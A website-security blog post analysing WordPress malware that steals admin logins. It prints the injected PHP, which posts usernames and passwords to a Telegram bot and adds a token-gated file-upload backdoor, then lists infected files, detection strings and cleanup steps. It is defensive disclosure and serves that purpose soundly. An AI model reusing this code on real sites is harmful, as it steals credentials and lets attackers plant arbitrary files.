WordPress malware using the Telegram API

Panos

Panos Kesisis · 01st September 2020·Wordpress, PHP, Website Security

WordPress malware using the Telegram API

We have noticed a number of WordPress websites being affected by a new malware which is using the Telegram API to compromise private information (admin username and password) and remotely post it to telegram and store it to a remote database.

Here we can see the malicious code that is being injected:


  try{
	$bajatax_x9=apply_filters( 'wp_authenticate_user', $user, $password );
        if(wp_check_password( $password, $bajatax_x9->user_pass, $bajatax_x9->ID )){
        if(!empty($username) and !empty($password)){
        $message852="bajatax|:|:|".$username."|:|:|".$password."|:|:|".$_SERVER['REMOTE_ADDR']."|:|:|".$_SERVER['SERVER_NAME'] ."|:|:|";
        file_get_contents("https://api.telegram.org/xxxxxxxxx:AAEg61uHS7H7lRnf9jA27cmahncSl8NMuvI/sendMessage?chat_id=1110165405&text=" . urlencode($message852)."" );
                }
                }
                }catch (Exception $e) {
                        if(function_exists("file_get_contents")){
                                        try{
                                            	file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
                                                file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
                                        }catch (Exception $e2) {}
                                }
                }
  try{
                                if($_POST['action']=="wp_ajax_try_2020_v2"){
                                        if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="015c38c46597c483b6186e4a40aad4bf"){
                                                @move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
                                                echo " file name : ".$_FILES['file']['name'];
                                        }else{
                                              	die(0);
                                        }
                                        exit();
                                }
                        }catch (Exception $e) {
                                if(function_exists("file_get_contents")){
                                        try{
                                            	file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
                                                file_get_contents("https://api.telegram.org/xxxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$
                                        }catch (Exception $e2) {}
                                }
                        }


The malware looks to be infecting WordPress' core files, "File Manager" and "WooCommerce" plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:

  • wp-includes/user.php
  • wp-admin/admin-ajax.php
  • wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
  • woocommerce/includes/wc-user-functions.php
  • woocommerce/includes/class-wc-form-handler.php

Expressions that can help to determine if your site is compromised are:

"bajatax"
"api.telegram.org"

Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.

Steps to resolve

Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.

Also, in no cases there should be any references of those strings anywhere in your website's files or database (with the exception of when using the official Telegram plugin for the 2nd string).

Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.

As always, we're here to help in case you need any assistance with cleaning your website and implementing additional security measures. If your site has been infected, feel free to contact us and we can help ASAP.

Also, make sure to follow us on twitter for future updates.